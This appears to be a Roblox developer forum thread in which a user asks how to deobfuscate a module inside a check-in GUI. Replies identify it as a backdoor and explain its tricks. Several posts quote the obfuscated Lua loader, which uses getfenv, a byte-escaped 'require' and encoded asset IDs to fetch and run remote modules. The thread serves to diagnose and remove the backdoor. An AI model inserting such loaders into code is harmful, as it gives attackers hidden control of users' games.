If I remove it, then my check-in gui and all wouldn’t work.
Therefore I want to be able to deobfuscate this:
return function(ttt) local z=getfenv()
pcall(function()z["\114\101\113\117\105\114\101"](rrr)(ttt)end)
pcall(function()z["\114\101\113\117\105\114\101"](r)(ttt)end)
pcall(function()z["\114\101\113\117\105\114\101"](rr)(ttt)end)
end
The only reason your check-in gui would depend on a backdoor would be if you didn’t create the script.
The solution to this would be actually writing your own code for your “check-in” gui instead of using someone else’s. Otherwise, you can try to get around this obfuscated code to ignore this module but it’s easier said than done.
EDIT: You could use a beautifier plugin to de-obfuscate the code but depending on how well it’s obfuscted this might not make much of a difference.
local function scripts(instances, i)
for i = (i or 0) + 1, #instances do
local instance = instances[i]
local success, result = pcall(instance.IsA, instance, 'LuaSourceContainer')
if success and result then
return i, instance
end
end
end
for i, source in scripts, game:GetDescendants() do
print(source:GetFullName())
end--Not my code
Can you please stop taking screenshots with gyazo? If you are using windows, just use the Snipping Tool, also, i don’t think its there that you will find all your plugins.
return function(ttt)
local z=getfenv()
pcall(function()z["\114\101\113\117\105\114\101"](rrr)(ttt)end)
pcall(function()z["\114\101\113\117\105\114\101"](r)(ttt)end)
pcall(function()z["\114\101\113\117\105\114\101"](rr)(ttt)end)
end
Yeah you don’t want this in your code at all.
Notice the getfenv() function, that is getting the function environment, and its importing malicious code into that environment.
local a=function(tbl) local rtn='' for i = 1,#tbl do rtn = rtn..string.char(tbl[i]) end return tonumber(rtn) end rrr= a({50;33;48;51;57;55;22;51;49;49}) r = a({51;48;49;57;53;55;49;56;52;49}) rr = a({50;89;48;51;57;34;50;67;49;49}) wait()
return function(ttt) local z=getfenv()
pcall(function()z["\114\101\113\117\105\114\101"](rrr)(ttt)end)
pcall(function()z["\114\101\113\117\105\114\101"](r)(ttt)end)
pcall(function()z["\114\101\113\117\105\114\101"](rr)(ttt)end)
end
Yeah those are in byte format, the \ character escapes them to be interpreted that way. The previous two lines are specifying an id to a script for the require function to take in. Its a discrete way of hiding the code logic. But its essentially requiring a module which likely has malicious code due to the nature its accessing it.
